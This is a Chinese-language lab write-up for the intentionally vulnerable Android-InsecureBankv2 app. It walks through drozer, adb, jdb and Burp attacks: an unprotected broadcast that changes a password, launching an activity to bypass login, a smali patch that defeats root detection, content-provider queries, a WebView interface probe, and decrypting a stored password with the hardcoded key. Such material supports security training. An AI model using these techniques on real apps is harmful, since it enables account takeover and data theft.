insecurebankv2之演练

0x00 前言

对Android-InsecureBankv2演练apk进行测试。

地址:
https://github.com/dineshshetty/Android-InsecureBankv2

首先收集权限信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
dz> run app.package.info -a  com.android.insecurebankv2
Package: com.android.insecurebankv2
Application Label: InsecureBankv2
Process Name: com.android.insecurebankv2
Version: 1.0
Data Directory: /data/data/com.android.insecurebankv2
APK Path: /data/app/com.android.insecurebankv2-1.apk
UID: 10048
GID: [3003, 1015, 1028]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.INTERNET
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.SEND_SMS
- android.permission.USE_CREDENTIALS
- android.permission.GET_ACCOUNTS
- android.permission.READ_PROFILE
- android.permission.READ_CONTACTS
- android.permission.READ_PHONE_STATE
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.READ_CALL_LOG
- android.permission.ACCESS_NETWORK_STATE
- android.permission.ACCESS_COARSE_LOCATION
Defines Permissions:
- None


dz> run app.package.attacksurface com.android.insecurebankv2
Attack Surface:
5 activities exported
1 broadcast receivers exported
1 content providers exported
0 services exported
is debuggable

0x01 Flawed Broadcast Receivers

1
2
3
4
dz> run app.broadcast.info -a com.android.insecurebankv2
Package: com.android.insecurebankv2
com.android.insecurebankv2.MyBroadCastReceiver
Permission: null

代码如下:

1.png

使用adb shell

1
am broadcast -n com.android.insecurebankv2/.MyBroadCastReceiver --es phonenumber "15555215554" --es newpass "Jack@123$"

0x02 Intent Sniffing and Injection

根据下面的截图里面的参数
2.png

写如下的代码。
代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
String phn = intent.getStringExtra("phonenumber");
String newpass = intent.getStringExtra("newpass");

if (phn != null) {
try {
Intent bintent = new Intent(context, MainActivity.class);
bintent.putExtra("phonenumber", phn);
bintent.putExtra("newpass",newpass);

bintent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(bintent);

System.out.println("Phonenumber:"+phn);
System.out.println("newpass:"+newpass);

} catch (Exception e) {
e.printStackTrace();
}
}
else {
System.out.println("Phone number is null");
}

接受phonenumber 和 newpass这两个字段的信息。

0x03 Weak Authorization mechanism

在LoginActivity.java 发现

3.png

跟进一下button_CreateUser点击事件是干什么

4.png

再跟进createUser 函数

5.png

只要我们修改字符串资源里面的is_admin就可以了。

6.png

就可以使用管理员的功能了。

0x04 Local Encryption issues+Weak Cryptography implementation+Hardcoded secrets

cd /data/data/com.android.insecurebankv2/shared_prefs

7.png

分别打开了两个文件

8.png

发现 SharedPreferences.xml 里面有敏感消息,可是加密的。

9.png

找到加密类
CryptoClass.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
//    The super secret key used by the encryption function
String key = "This is the super secret key 123";

// The initialization vector used by the encryption function
byte[] ivBytes = {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
String plainText;
byte[] cipherData;
String base64Text;
String cipherText;


/*
The function that handles the aes256 decryption.
ivBytes: Initialization vector used by the decryption function
keyBytes: Key used as input by the decryption function
textBytes: Ciphertext input to the decryption function
*/
public static byte[] aes256decrypt(byte[] ivBytes, byte[] keyBytes, byte[] textBytes)
throws UnsupportedEncodingException,
NoSuchAlgorithmException,
NoSuchPaddingException,
InvalidKeyException,
InvalidAlgorithmParameterException,
IllegalBlockSizeException,
BadPaddingException {

AlgorithmParameterSpec ivSpec = new IvParameterSpec(ivBytes);
SecretKeySpec newKey = new SecretKeySpec(keyBytes, "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.DECRYPT_MODE, newKey, ivSpec);
return cipher.doFinal(textBytes);

}

public String aesDeccryptedString(String theString) throws UnsupportedEncodingException, InvalidKeyException, NoSuchAlgorithmException, NoSuchPaddingException, InvalidAlgorithmParameterException, IllegalBlockSizeException, BadPaddingException {
// TODO Auto-generated method stub
byte[] keyBytes = key.getBytes("UTF-8");
cipherData = aes256decrypt(ivBytes, keyBytes, Base64.decode(theString.getBytes("UTF-8"), Base64.DEFAULT));
plainText = new String(cipherData, "UTF-8");
return plainText;
}

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);

String password = "ecwTx6F9cmLbqyD+1yfKjA==";
String decryptedPassword;
try {

decryptedPassword = aesDeccryptedString(password);
System.out.println(decryptedPassword);


} catch (InvalidKeyException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (NoSuchAlgorithmException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (NoSuchPaddingException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (InvalidAlgorithmParameterException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IllegalBlockSizeException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (BadPaddingException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}

把里面的解密函数提取出来就可以了。

0x05 Vulnerable Activity Components

搜集具体哪些activity

run app.activity.info -a com.android.insecurebankv2

10.png

使用adb shell

1
am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin

就可以绕过登陆了。

0x06 Root Detection and Bypass

调用了showRootStatus 跟进一下

11.png

这里看到了判断root的条件

12.png

在:cond_2 这里显示Device not Rooted!!

13.png

那么使用goto语句跳转到condd_2

14.png

成功截图

15.png

0x07 Insecure Content Provider access

搜集具体哪些provider

1
run app.provider.info -a com.android.insecurebankv2

16.png

发现url

1
run app.provider.finduri com.android.insecurebankv2

17.png

这些链接的格式如下

content://包名.数据库/表名

查看trackerusers表里面的内容

1
run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

使用drozer查看登陆过的账户

18.png

0x08 Insecure Webview implementation + Insecure SDCard storage

在 DoLogin.java 文件中

下面的代码是写入sdcard卡中。

19.png

然后把Statements_jack.html 取回到电脑中进行修改。

1
adb pull /mnt/sdcard/Statements_jack.html Statements_jack

修改成如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>WebView漏洞检测</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<script async src="http://c.cnzz.com/core.php"></script></head>
<body>
<p>
<b>如果当前app存在漏洞,将会在页面中输出存在漏洞的接口方便程序员做出修改:</b>
</p>
<script type="text/javascript">
function check()
{
for (var obj in window)
{
try {
if ("getClass" in window[obj]) {
try{
window[obj].getClass();
document.write('<span style="color:red">'+obj+'</span>');
document.write('<br />');
}catch(e){
}
}
} catch(e) {
}
}
}
check();
</script>
</body>
</html>
1
adb push Statements_jack /mnt/sdcard/Statements_jack.html

结果如下
20.png

0x09 Insecure Logging mechanism

在logcat中添加 com.android.insecurebankv2 过滤器。

21.png

结果在logcat看到敏感消息

22.png

0x10 Android Pasteboard vulnerability

23.png
字典存储在了
/data/data/com.android.providers.userdictionary/databases/user_dict.db

24.png

0x11 Application Debuggable+Application Debuggable

进入ddms查看com.android.insecurebankv2 id

25.png

1
2
adb forward tcp:23946 jdwp:1082
jdb -connect "com.sun.jdi.SocketAttach:hostname=127.0.0.1,port=8700"

26.png

1
classes

27.png
28.png

1
methods com.android.insecurebankv2.LoginActivity

29.png

点击一下create User按钮

30.png

1
Step

31.png

Locals 查看下本地变量

32.png

更改text里面的内容

33.png

再执行以下run命令

34.png

结果如下
35.png

0x12 Android keyboard cache issues

36.png
把输入添加到剪切板中。

1
2
3
ps | grep insecure
su u0_a48
service call clipboard 2 s16 com.android.insecurebankv2

37.png

0x13 Developer Backdoors

38.png

根据后门用户名是devadmin就是后门。

0x14 Insecure HTTP connections+Parameter Manipulation

手机模拟器的设置。
39.png
Bupsuite的设置

40.png

0x15 Weak change password implementation

只要拦截修改密码的数据包,然后修改username就可以修改任意账号的密码。

41.png

0x16 Username Enumeration issue

42.png

发送intruder模块中,设置username为变量进行爆破。

43.png
枚举jack这个用户名。

0x17 Android Backup vulnerability

使用下面的命令进行备份

1
adb backup -f backup.ab com.android.insecurebankv2

44.png

Back up my data

45.png

从这里下载 https://sourceforge.net/projects/adbextractor/ android-backup-extractor 解压 android-backup-extractor。

在当前目录下生成 backup.ab 复制到 android-backup-extractor 目录下。

java -jar abe.jar unpack backup.ab backup.zip

46.png

打开backup.zip
47.png